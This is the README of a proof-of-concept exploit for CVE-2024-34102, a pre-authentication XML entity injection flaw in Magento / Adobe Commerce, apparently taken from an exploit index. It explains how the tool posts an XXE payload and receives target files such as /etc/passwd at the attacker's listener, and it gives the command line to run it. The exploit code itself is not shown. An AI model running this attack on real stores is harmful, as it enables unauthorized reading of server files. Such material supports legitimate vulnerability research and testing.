## https://sploitus.com/exploit?id=3D3C29B1-A74C-52D1-9AC6-53ED17A82841
# CVE-2024-34102
POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.
![Banner](screens/screen.jpg)
## Overview
This POC will attempt to read files from target hosts that are vulnerable to the recent Magento / Adobe Commerce CVE-2024-34102. This POC is based on this [security advisory](https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md) and this research by [Assetnote](https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102).
## How to Use
In order to run this poc, you will have to have a machine with published and accessible IP.
### What This POC Does
1. Creates a local file `poc.xml` containing the main payloads.
2. Sends the payload to the target via a POST request.
3. Sets up a listener on your machine for incoming GET requests from the target.
4. Attempts to read files from the target (default: `/etc/passwd`).
### Minimum Requirements
- Python 3.6 or higher
- `requests` library
To use this POC against a single target:
```sh
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)
```
## Contact
For any suggestions or thoughts, please get in touch with [me](https://x.com/MohamedNab1l).
## Disclaimer
This provided tool is for educational purposes only. I do not encourage, condone, or support unauthorized access to any system or network. Use this tool responsibly and only on systems you have explicit permission to test. Any actions and consequences resulting from misuse of this tool are your own responsibility.
## References
- https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
- https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102